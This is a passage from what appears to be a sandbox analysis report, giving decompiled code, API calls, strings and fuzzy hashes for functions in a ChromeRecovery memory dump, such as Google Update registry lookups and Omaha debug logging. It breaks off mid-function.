
TryEnterCriticalSection.KERNEL32(?,?,?,?,00C73B81,00000000,00000000,00000000,?,?,?,?,?,?,00C715F8,?), ref: 00C77B7E
GetTickCount.KERNEL32 ref: 00C77B88
Sleep.KERNEL32(00000000), ref: 00C77B93
TryEnterCriticalSection.KERNEL32(?,?,00C73B81,00000000,00000000,00000000,?,?,?,?,?,?,00C715F8,?,?,?), ref: 00C77B9A
GetTickCount.KERNEL32 ref: 00C77BA4

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: CountCriticalEnterSectionTick$Sleep
String ID:
API String ID: 1544504822-0
Opcode ID: 29bd69f2833bd46f99c6437f7ccefc629f80fa9dc4e6a23eb90e0715dbf263b9
Instruction ID: f46d32420d662c1494cd7c914ae4901c77f1cd74c647af460d7293b1786489db
Opcode Fuzzy Hash: 29bd69f2833bd46f99c6437f7ccefc629f80fa9dc4e6a23eb90e0715dbf263b9
Instruction Fuzzy Hash: 1CE06531129118EBCB009F61DD4DF9D3B68EF01709B104395ED0AD6120D7309A01DBB9

Uniqueness

Uniqueness Score: -1.00%

Function 00C7CA5A Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 182
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00C7CA5A(intOrPtr* __ecx, intOrPtr* _a4, char _a8, void* _a12, intOrPtr* _a20) {
				intOrPtr* _v0;
				char _v12;
				signed int _v16;
				void* _v20;
				intOrPtr* _v24;
				void* __ebx;
				void* __edi;
				void* __ebp;
				intOrPtr _t76;
				intOrPtr* _t82;
				intOrPtr* _t84;
				intOrPtr* _t88;
				void* _t90;
				intOrPtr* _t92;
				intOrPtr* _t96;
				intOrPtr* _t97;
				void* _t117;
				intOrPtr* _t119;
				signed int _t125;
				intOrPtr _t127;
				intOrPtr _t128;
				intOrPtr _t129;
				intOrPtr* _t130;
				intOrPtr* _t132;
				intOrPtr* _t134;
				intOrPtr* _t137;
				char _t138;
				intOrPtr* _t140;
				void* _t144;
				void* _t145;

				_t121 = __ecx;
				_t76 =  *((intOrPtr*)(__ecx + 4));
				if(_t76 >= 0x4ec4ec3) {
					E00C7CA4B(_a20);
					_push("map/set<T> too long");
					E00C8017C();
					asm("int3");
					_t145 = _t144 - 0xc;
					_t117 =  *_t121;
					_t125 = 1;
					_v24 = _t121;
					_v20 = 1;
					_t137 =  *((intOrPtr*)(_t117 + 4));
					if( *((char*)(_t137 + 0xd)) == 0) {
						do {
							_t51 = _t137 + 0x10; // 0x10
							_t117 = _t137;
							_t90 = E00C93EC9(_a8, _t51, 0x10);
							_t145 = _t145 + 0xc;
							_t125 = _t125 & 0xffffff00 | _t90 < 0x00000000;
							_v16 = _t125;
							if(_t90 >= 0) {
								_t137 =  *((intOrPtr*)(_t137 + 8));
							} else {
								_t137 =  *_t137;
							}
						} while ( *((char*)(_t137 + 0xd)) == 0);
						_t121 = _v20;
					}
					_t138 = _t117;
					_v12 = _t138;
					if(_t125 == 0) {
						L34:
						_t132 = _v0;
						_t67 = _t138 + 0x10; // 0x20
						if(E00C93EC9(_t67, _a8, 0x10) >= 0) {
							E00C7C7C7(_t117, _a12, _t132);
							 *_t132 = _t138;
							 *((char*)(_t132 + 4)) = 0;
						} else {
							_push(_a12);
							_t84 = E00C7CA5A(_v20,  &_a12, _v16, _t117, _t121);
							 *((char*)(_t132 + 4)) = 1;
							 *_t132 =  *_t84;
						}
						_t82 = _t132;
					} else {
						if(_t117 !=  *((intOrPtr*)( *_t121))) {
							_t121 =  &_v12;
							E00C71FFC( &_v12);
							_t138 = _v12;
							goto L34;
						} else {
							_push(_a12);
							_t88 = E00C7CA5A(_t121,  &_a12, 1, _t117, _t121);
							_t82 = _v0;
							 *_t82 =  *_t88;
							 *((char*)(_t82 + 4)) = 1;
						}
					}
					return _t82;
				} else {
					_push(_t136);
					_push(_t131);
					_t134 = _a20;
					 *((intOrPtr*)(__ecx + 4)) = _t76 + 1;
					_t92 = _a12;
					 *((intOrPtr*)(_t134 + 4)) = _t92;
					_t127 =  *__ecx;
					if(_t92 != _t127) {
						if(_a8 == 0) {
							 *((intOrPtr*)(_t92 + 8)) = _t134;
							_t128 =  *__ecx;
							if(_t92 ==  *((intOrPtr*)(_t128 + 8))) {
								 *((intOrPtr*)(_t128 + 8)) = _t134;
							}
						} else {
							 *_t92 = _t134;
							_t130 =  *__ecx;
							if(_t92 ==  *_t130) {
								 *_t130 = _t134;
							}
						}
					} else {
						 *((intOrPtr*)(_t127 + 4)) = _t134;
						 *((intOrPtr*)( *__ecx)) = _t134;
						 *((intOrPtr*)( *__ecx + 8)) = _t134;
					}
					_t12 = _t134 + 4; // 0xf89088b
					_t140 = _t134;
					if( *((char*)( *_t12 + 0xc)) == 0) {
						_push(_t116);
						do {
							_t14 = _t140 + 4; // 0xf89088b
							_t97 =  *_t14;
							_t119 =  *((intOrPtr*)(_t97 + 4));
							_t129 =  *_t119;
							if(_t97 != _t129) {
								if( *((char*)(_t129 + 0xc)) != 0) {
									if(_t140 ==  *_t97) {
										_t140 = _t97;
										E00C72296(_t121, _t140);
									}
									_t34 = _t140 + 4; // 0xf89088b
									 *((char*)( *_t34 + 0xc)) = 1;
									_t36 = _t140 + 4; // 0xf89088b
									 *((char*)( *((intOrPtr*)( *_t36 + 4)) + 0xc)) = 0;
									_t39 = _t140 + 4; // 0xf89088b
									E00C722DC(_t121,  *((intOrPtr*)( *_t39 + 4)));
								} else {
									goto L16;
								}
							} else {
								_t129 =  *((intOrPtr*)(_t119 + 8));
								if( *((char*)(_t129 + 0xc)) == 0) {
									L16:
									 *((char*)(_t97 + 0xc)) = 1;
									 *((char*)(_t129 + 0xc)) = 1;
									_t29 = _t140 + 4; // 0xf89088b
									 *((char*)( *((intOrPtr*)( *_t29 + 4)) + 0xc)) = 0;
									_t32 = _t140 + 4; // 0xf89088b
									_t140 =  *((intOrPtr*)( *_t32 + 4));
								} else {
									if(_t140 ==  *((intOrPtr*)(_t97 + 8))) {
										_t140 = _t97;
										E00C722DC(_t121, _t140);
									}
									 *((char*)( *((intOrPtr*)(_t140 + 4)) + 0xc)) = 1;
									 *((char*)( *((intOrPtr*)( *((intOrPtr*)(_t140 + 4)) + 4)) + 0xc)) = 0;
									E00C72296(_t121,  *((intOrPtr*)( *((intOrPtr*)(_t140 + 4)) + 4)));
								}
							}
							_t41 = _t140 + 4; // 0xf89088b
						} while ( *((char*)( *_t41 + 0xc)) == 0);
					}
					 *((char*)( *((intOrPtr*)( *_t121 + 4)) + 0xc)) = 1;
					_t96 = _a4;
					 *_t96 = _t134;
					return _t96;
				}
			}

0x00c7ca5a
0x00c7ca5d
0x00c7ca65
0x00c7cb6a
0x00c7cb6f
0x00c7cb74
0x00c7cb79
0x00c7cb7d
0x00c7cb81
0x00c7cb83
0x00c7cb86
0x00c7cb89
0x00c7cb8c
0x00c7cb93
0x00c7cb95
0x00c7cb97
0x00c7cb9a
0x00c7cba0
0x00c7cba5
0x00c7cbaa
0x00c7cbad
0x00c7cbb2
0x00c7cbb8
0x00c7cbb4
0x00c7cbb4
0x00c7cbb4
0x00c7cbbb
0x00c7cbc1
0x00c7cbc1
0x00c7cbc4
0x00c7cbc6
0x00c7cbcb
0x00c7cbfb
0x00c7cbfc
0x00c7cbff
0x00c7cc12
0x00c7cc35
0x00c7cc3a
0x00c7cc3c
0x00c7cc14
0x00c7cc14
0x00c7cc23
0x00c7cc28
0x00c7cc2e
0x00c7cc2e
0x00c7cc40
0x00c7cbcd
0x00c7cbd1
0x00c7cbf0
0x00c7cbf3
0x00c7cbf8
0x00000000
0x00c7cbd3
0x00c7cbd3
0x00c7cbde
0x00c7cbe5
0x00c7cbe8
0x00c7cbea
0x00c7cbea
0x00c7cbd1
0x00c7cc46
0x00c7ca6b
0x00c7ca6b
0x00c7ca6c
0x00c7ca6d
0x00c7ca71
0x00c7ca74
0x00c7ca77
0x00c7ca7a
0x00c7ca7e
0x00c7ca92
0x00c7caa0
0x00c7caa3
0x00c7caa8
0x00c7caaa
0x00c7caaa
0x00c7ca94
0x00c7ca94
0x00c7ca96
0x00c7ca9a
0x00c7ca9c
0x00c7ca9c
0x00c7ca9a
0x00c7ca80
0x00c7ca80
0x00c7ca85
0x00c7ca89
0x00c7ca89
0x00c7caad
0x00c7cab0
0x00c7cab6
0x00c7cabc
0x00c7cabd
0x00c7cabd
0x00c7cabd
0x00c7cac0
0x00c7cac3
0x00c7cac7
0x00c7cb01
0x00c7cb1f
0x00c7cb21
0x00c7cb24
0x00c7cb24
0x00c7cb29
0x00c7cb2c
0x00c7cb30
0x00c7cb36
0x00c7cb3a
0x00c7cb40
0x00000000
0x00000000
0x00000000
0x00c7cac9
0x00c7cac9
0x00c7cad0
0x00c7cb03
0x00c7cb03
0x00c7cb07
0x00c7cb0b
0x00c7cb11
0x00c7cb15
0x00c7cb18
0x00c7cad2
0x00c7cad5
0x00c7cad7
0x00c7cada
0x00c7cada
0x00c7cae2
0x00c7caec
0x00c7caf6
0x00c7caf6
0x00c7cad0
0x00c7cb45
0x00c7cb48
0x00c7cb52
0x00c7cb58
0x00c7cb5c
0x00c7cb5f
0x00c7cb64
0x00c7cb64

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00C7CB74
_memcmp.LIBVCRUNTIME ref: 00C7CBA0
_memcmp.LIBVCRUNTIME ref: 00C7CC08

Strings

map/set<T> too long, xrefs: 00C7CB6F

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: _memcmp$Xinvalid_argumentstd::_
String ID: map/set<T> too long
API String ID: 3765847870-1285458680
Opcode ID: f12414174b413f5e086762b41c15513ddcfd257bf642b28eafec491659075eab
Instruction ID: dc431d6f3b13635fc2f816c3539e81b05e14f72fab9eac1890d2805fcfd69650
Opcode Fuzzy Hash: f12414174b413f5e086762b41c15513ddcfd257bf642b28eafec491659075eab
Instruction Fuzzy Hash: FE717771A0024A9FDB11CF29C4C5E9ABBE5AF15324F18C488E86C9B362C375ED84DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00C7A183 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 105
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C7A183(char __ecx, void* __edx, void* __eflags) {
				void* _v5;
				char _v12;
				char _v16;
				char _v20;
				void* _v24;
				void* _v28;
				char _v32;
				intOrPtr _v36;
				void* _v40;
				char _v44;
				void* __edi;
				void* __esi;
				void* __ebp;
				char* _t39;
				void* _t47;
				intOrPtr _t51;
				long _t53;
				intOrPtr _t54;
				signed int _t56;
				long _t81;
				signed int _t82;
				void* _t83;
				char _t84;

				_t75 = __edx;
				_v5 = __ecx;
				_v32 = 0;
				_v28 = 0;
				_v24 = 0;
				if(E00C79D31( &_v32, __edx, 0, __eflags) < 0) {
					L14:
					_t81 = 1;
					__eflags = 1;
				} else {
					_t54 = _v28;
					if(_v32 == _t54) {
						goto L14;
					} else {
						E00C7B8E6(_t75);
						_t88 = _v5;
						_t39 = L"HKLM\\Software\\Google\\Update\\";
						if(_v5 == 0) {
							_t39 = L"HKCU\\Software\\Google\\Update\\";
						}
						E00C7189E( &_v12, _t75, _t88, _t39);
						E00C7189E( &_v16, _t75, _t88, L"uid");
						E00C713C0(E00C713C0(E00C74860( &_v12, _t83, E00C76413( &_v20,  &_v12,  &_v16)), _v20 - 0x10), _v16 - 0x10);
						_t84 = _v12;
						_t47 = E00C786B2(_t84,  &_v12, _t88);
						_t89 = _t47;
						if(_t47 != 0) {
							_v44 = 0xca41c0;
							_v40 = 0;
							_v36 = 0x200;
							_t81 = E00C780D1( &_v44,  &_v12, __eflags, _t84, 1);
							__eflags = _t81;
							if(_t81 >= 0) {
								_t51 = _v32;
								_t82 = 0;
								_t56 = _t54 - _t51 >> 2;
								__eflags = _t56;
								if(_t56 == 0) {
									L10:
									__eflags = 0;
									_t81 = E00C7A2B7(_v5, 0, 0);
								} else {
									while(1) {
										_t53 = RegQueryValueExW(_v40,  *(_t51 + _t82 * 4), 0, 0, 0, 0);
										__eflags = _t53;
										if(_t53 == 0) {
											break;
										}
										_t51 = _v32;
										_t82 = _t82 + 1;
										__eflags = _t82 - _t56;
										if(_t82 < _t56) {
											continue;
										} else {
											goto L10;
										}
										goto L11;
									}
									_t81 = 0;
								}
							}
							L11:
							_v44 = 0xca41c0;
							_t49 = E00C77F74( &_v44);
						} else {
							_t81 = E00C7A2B7(_v5, 1, _t89);
						}
						_t33 = _t84 - 0x10; // -16
						E00C713C0(_t49, _t33);
					}
				}
				E00C751E9();
				return _t81;
			}

0x00c7a183
0x00c7a18e
0x00c7a194
0x00c7a197
0x00c7a19a
0x00c7a1a4
0x00c7a2a5
0x00c7a2a7
0x00c7a2a7
0x00c7a1aa
0x00c7a1aa
0x00c7a1b0
0x00000000
0x00c7a1b6
0x00c7a1b6
0x00c7a1bb
0x00c7a1bf
0x00c7a1c4
0x00c7a1c6
0x00c7a1c6
0x00c7a1cf
0x00c7a1dc
0x00c7a20b
0x00c7a210
0x00c7a215
0x00c7a21a
0x00c7a21c
0x00c7a232
0x00c7a239
0x00c7a23c
0x00c7a248
0x00c7a24a
0x00c7a24c
0x00c7a24e
0x00c7a251
0x00c7a255
0x00c7a258
0x00c7a25a
0x00c7a27c
0x00c7a27f
0x00c7a286
0x00c7a25c
0x00c7a25c
0x00c7a26a
0x00c7a270
0x00c7a272
0x00000000
0x00000000
0x00c7a274
0x00c7a277
0x00c7a278
0x00c7a27a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00c7a27a
0x00c7a2a1
0x00c7a2a1
0x00c7a25a
0x00c7a288
0x00c7a28b
0x00c7a292
0x00c7a21e
0x00c7a228
0x00c7a228
0x00c7a297
0x00c7a29a
0x00c7a29a
0x00c7a1b0
0x00c7a2ab
0x00c7a2b6

APIs

RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000), ref: 00C7A26A

Strings

HKCU\Software\Google\Update\, xrefs: 00C7A1C6, 00C7A1CB
uid, xrefs: 00C7A1D4
HKLM\Software\Google\Update\, xrefs: 00C7A18A, 00C7A1BF

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: QueryValue
String ID: HKCU\Software\Google\Update\$HKLM\Software\Google\Update\$uid
API String ID: 3660427363-1370543165
Opcode ID: 9a202644b22dfb417cde73579b6ff9f2ac64170b39ac2b43d8cfc816862cc01e
Instruction ID: 6d582991b9a98d96877633cd12289cc58323d2b20ac74ecbaeb3b2f3ef72f21c
Opcode Fuzzy Hash: 9a202644b22dfb417cde73579b6ff9f2ac64170b39ac2b43d8cfc816862cc01e
Instruction Fuzzy Hash: C431F43190024A9BCF04EBE5C881BEEBBB5AFD0304F108069E51A77292DF715A0ADB91

Uniqueness

Uniqueness Score: -1.00%

Function 00C72E47 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E00C72E47(void* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				struct _BY_HANDLE_FILE_INFORMATION _v60;
				void* __ebp;
				signed int _t6;
				void* _t26;
				signed int _t27;

				_t6 =  *0xca8008; // 0x617e0cdd
				_v8 = _t6 ^ _t27;
				_t26 = __ecx;
				if(__ecx != 0) {
					E00C81190(__edi,  &_v60, 0, 0x34);
					__eflags = GetFileInformationByHandle(_t26,  &_v60);
					if(__eflags != 0) {
						__eflags = _v60.dwFileAttributes >> 0x0000000a & 0x00000001;
					} else {
						_push(GetLastError());
						_push(L"LOG_SYSTEM: ERROR - [::GetFileInformationByHandle failed][%d]");
						OutputDebugStringW(E00C76CB8(__eflags));
						goto L1;
					}
				} else {
					L1:
				}
				return E00C7F35B(_v8 ^ _t27);
			}

0x00c72e4d
0x00c72e54
0x00c72e58
0x00c72e5c
0x00c72e6a
0x00c72e7d
0x00c72e7f
0x00c72ea3
0x00c72e81
0x00c72e87
0x00c72e88
0x00c72e95
0x00000000
0x00c72e95
0x00c72e5e
0x00c72e5e
0x00c72e5e
0x00c72eb1

APIs

GetFileInformationByHandle.KERNEL32 ref: 00C72E77
GetLastError.KERNEL32 ref: 00C72E81
OutputDebugStringW.KERNEL32 ref: 00C72E95

Strings

LOG_SYSTEM: ERROR - [::GetFileInformationByHandle failed][%d], xrefs: 00C72E88

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: DebugErrorFileHandleInformationLastOutputString
String ID: LOG_SYSTEM: ERROR - [::GetFileInformationByHandle failed][%d]
API String ID: 2968764131-979073235
Opcode ID: aadb027d2f64e2ebbcbf11d030b5eff1041401be3193cb1302606a248b2339ce
Instruction ID: 2073bebe0280dcda055ca9cd0b20b967f6698808baaf895b318258c82338f5b4
Opcode Fuzzy Hash: aadb027d2f64e2ebbcbf11d030b5eff1041401be3193cb1302606a248b2339ce
Instruction Fuzzy Hash: B9F02B71A15108AFDB14BBA4EC0AFBE77BCEF05705F80411AF905D7180EB70AE059795

Uniqueness

Uniqueness Score: -1.00%

Function 00C78DBF Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00C78DBF() {
				void _v40;
				signed int _t5;
				signed int _t8;
				signed int _t12;
				intOrPtr* _t14;
				void* _t15;

				_t5 =  *0xca8a90; // 0xffff
				if(_t5 == 0xffff) {
					_t14 = GetProcAddress(GetModuleHandleW(L"kernel32"), "GetNativeSystemInfo");
					_t8 = 0;
					if(_t14 != 0) {
						_t12 = 9;
						memset( &_v40, 0, _t12 << 2);
						 *_t14( &_v40, _t15);
						_t8 = _v40 & 0x0000ffff;
					}
					 *0xca8a90 = _t8;
					return _t8;
				}
				return _t5;
			}

0x00c78dc2
0x00c78dcf
0x00c78de8
0x00c78dea
0x00c78dee
0x00c78df3
0x00c78df7
0x00c78dfd
0x00c78dff
0x00c78e03
0x00c78e04
0x00000000
0x00c78e04
0x00c78e0a

APIs

GetModuleHandleW.KERNEL32 ref: 00C78DD6
GetProcAddress.KERNEL32 ref: 00C78DE2

Strings

GetNativeSystemInfo, xrefs: 00C78DDC
kernel32, xrefs: 00C78DD1

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetNativeSystemInfo$kernel32
API String ID: 1646373207-3846845290
Opcode ID: 402c9b07721edb4b4364b32093a4f262325d8e33dccfaf0617fd04b276c6b3f3
Instruction ID: 71f54b9123a32b182d21d0973eac144d86c60161b79dcea86de4f4f869415891
Opcode Fuzzy Hash: 402c9b07721edb4b4364b32093a4f262325d8e33dccfaf0617fd04b276c6b3f3
Instruction Fuzzy Hash: 64E06572E0420597CB14ABED9809A9F77E9AB89718B204533E605E3150EF70DE488691

Uniqueness

Uniqueness Score: -1.00%

Function 00C73AF8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 17
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C73AF8(void* __eax) {
				void* _t5;
				void* _t12;

				_t5 = __eax;
				OutputDebugStringA("Unexpected exception in: omaha::Logging::InternalLogMessageMaskedVA\r\n");
				OutputDebugStringW( *(_t12 + 0x1c));
				OutputDebugStringW(L"\n\r");
				 *((intOrPtr*)(_t12 - 4)) = 0xfffffffe;
				 *[fs:0x0] =  *((intOrPtr*)(_t12 - 0x10));
				return _t5;
			}

0x00c73af8
0x00c73b00
0x00c73b0f
0x00c73b16
0x00c73b18
0x00c73b22
0x00c73b2e

APIs

OutputDebugStringA.KERNEL32 ref: 00C73B00
OutputDebugStringW.KERNEL32 ref: 00C73B0F
OutputDebugStringW.KERNEL32 ref: 00C73B16

Strings

Unexpected exception in: omaha::Logging::InternalLogMessageMaskedVA, xrefs: 00C73AFB

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: DebugOutputString
String ID: Unexpected exception in: omaha::Logging::InternalLogMessageMaskedVA
API String ID: 1166629820-3049550389
Opcode ID: 78bbeacea2eee97c36a3fc58da9ad163f417129eb7796040fd191a340a7fde5f
Instruction ID: fae6c4fcb51edfcf3d8b45a18ad2835bdab323d8e0622fd0f58c3f8c6c720bb6
Opcode Fuzzy Hash: 78bbeacea2eee97c36a3fc58da9ad163f417129eb7796040fd191a340a7fde5f
Instruction Fuzzy Hash: CBD0C233A0425ADBCB108FC8ED0AB8DBB30EB44730F00026BFD125329097301510CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00C8DF41 Relevance: 6.3, APIs: 4, Instructions: 338
fileCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 79%

			E00C8DF41(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16, intOrPtr _a20) {
				char _v16;
				signed int _v20;
				char _v28;
				char _v35;
				signed char _v36;
				void _v44;
				long _v48;
				signed char* _v52;
				char _v53;
				long _v60;
				intOrPtr _v64;
				struct _OVERLAPPED* _v68;
				signed int _v72;
				struct _OVERLAPPED* _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				void _v92;
				long _v96;
				signed char* _v100;
				void* _v104;
				intOrPtr _v108;
				char _v112;
				int _v116;
				struct _OVERLAPPED* _v120;
				struct _OVERLAPPED* _v124;
				struct _OVERLAPPED* _v128;
				struct _OVERLAPPED* _v132;
				void* __ebp;
				signed int _t177;
				signed int _t178;
				signed int _t180;
				int _t186;
				signed char* _t190;
				signed char _t195;
				intOrPtr _t198;
				void* _t200;
				signed char* _t201;
				long _t205;
				intOrPtr _t210;
				void _t212;
				signed char* _t217;
				void* _t224;
				char _t227;
				struct _OVERLAPPED* _t229;
				void* _t238;
				signed int _t240;
				signed char* _t243;
				long _t246;
				intOrPtr _t247;
				signed char* _t248;
				void* _t258;
				intOrPtr _t265;
				struct _OVERLAPPED* _t267;
				signed int _t268;
				signed int _t273;
				intOrPtr* _t279;
				signed int _t281;
				signed int _t285;
				char _t286;
				long _t287;
				signed int _t291;
				signed char* _t292;
				void* _t296;
				struct _OVERLAPPED* _t297;
				signed int _t301;
				signed int _t303;
				struct _OVERLAPPED* _t304;
				signed char* _t307;
				intOrPtr* _t308;
				signed int _t310;
				long _t311;
				signed int _t312;
				signed int _t313;
				signed int _t314;
				void* _t315;
				void* _t316;
				void* _t317;

				_push(0xffffffff);
				_push(0xc964a4);
				_push( *[fs:0x0]);
				_t316 = _t315 - 0x74;
				_t177 =  *0xca8008; // 0x617e0cdd
				_t178 = _t177 ^ _t314;
				_v20 = _t178;
				_push(_t178);
				 *[fs:0x0] =  &_v16;
				_t180 = _a8;
				_t307 = _a12;
				_t265 = _a20;
				_t268 = (_t180 & 0x0000003f) * 0x38;
				_t291 = _t180 >> 6;
				_v100 = _t307;
				_v64 = _t265;
				_v84 = _t291;
				_v72 = _t268;
				_v104 =  *((intOrPtr*)( *((intOrPtr*)(0xca9720 + _t291 * 4)) + _t268 + 0x18));
				_v88 = _a16 + _t307;
				_t186 = GetConsoleOutputCP();
				_t318 =  *((char*)(_t265 + 0x14));
				_v116 = _t186;
				if( *((char*)(_t265 + 0x14)) == 0) {
					E00C88A50(_t265, _t291, _t318);
				}
				_t308 = _a4;
				_v108 =  *((intOrPtr*)( *((intOrPtr*)(_t265 + 0xc)) + 8));
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t190 = _v100;
				_t292 = _t190;
				_v52 = _t292;
				if(_t190 < _v88) {
					_t301 = _v72;
					_t267 = 0;
					_v76 = 0;
					do {
						_v53 =  *_t292;
						_v68 = _t267;
						_v48 = 1;
						_t273 =  *(0xca9720 + _v84 * 4);
						_v80 = _t273;
						if(_v108 != 0xfde9) {
							_t195 =  *((intOrPtr*)(_t301 + _t273 + 0x2d));
							__eflags = _t195 & 0x00000004;
							if((_t195 & 0x00000004) == 0) {
								_t273 =  *_t292 & 0x000000ff;
								_t198 =  *((intOrPtr*)( *((intOrPtr*)(_v64 + 0xc))));
								__eflags =  *((intOrPtr*)(_t198 + _t273 * 2)) - _t267;
								if( *((intOrPtr*)(_t198 + _t273 * 2)) >= _t267) {
									_push(_v64);
									_push(1);
									_push(_t292);
									goto L29;
								} else {
									_t217 =  &(_t292[1]);
									_v60 = _t217;
									__eflags = _t217 - _v88;
									if(_t217 >= _v88) {
										 *((char*)(_t301 + _v80 + 0x2e)) =  *_t292;
										 *( *(0xca9720 + _v84 * 4) + _t301 + 0x2d) =  *( *(0xca9720 + _v84 * 4) + _t301 + 0x2d) | 0x00000004;
										 *((intOrPtr*)(_t308 + 4)) = _v76 + 1;
									} else {
										_t224 = E00C8D48E(_t273, _t292,  &_v68, _t292, 2, _v64);
										_t317 = _t316 + 0x10;
										__eflags = _t224 - 0xffffffff;
										if(_t224 != 0xffffffff) {
											_t201 = _v60;
											goto L31;
										}
									}
								}
							} else {
								_push(_v64);
								_v36 =  *(_t301 + _t273 + 0x2e) & 0x000000fb;
								_t227 =  *_t292;
								_v35 = _t227;
								 *((char*)(_t301 + _t273 + 0x2d)) = _t227;
								_push(2);
								_push( &_v36);
								L29:
								_push( &_v68);
								_t200 = E00C8D48E(_t273, _t292);
								_t317 = _t316 + 0x10;
								__eflags = _t200 - 0xffffffff;
								if(_t200 != 0xffffffff) {
									_t201 = _v52;
									goto L31;
								}
							}
						} else {
							_t229 = _t267;
							_t279 = _t273 + 0x2e + _t301;
							while( *_t279 != _t267) {
								_t229 =  &(_t229->Internal);
								_t279 = _t279 + 1;
								if(_t229 < 5) {
									continue;
								}
								break;
							}
							_t303 = _v88 - _t292;
							_v48 = _t229;
							if(_t229 == 0) {
								_t73 = ( *_t292 & 0x000000ff) + 0xca8788; // 0x0
								_t281 =  *_t73 + 1;
								_v80 = _t281;
								__eflags = _t281 - _t303;
								if(_t281 > _t303) {
									__eflags = _t303;
									if(_t303 <= 0) {
										goto L44;
									} else {
										_t310 = _v72;
										do {
											 *((char*)( *(0xca9720 + _v84 * 4) + _t310 + _t267 + 0x2e)) =  *((intOrPtr*)(_t267 + _t292));
											_t267 =  &(_t267->Internal);
											__eflags = _t267 - _t303;
										} while (_t267 < _t303);
										goto L43;
									}
									L52:
								} else {
									_v132 = _t267;
									__eflags = _t281 - 4;
									_v128 = _t267;
									_v60 = _t292;
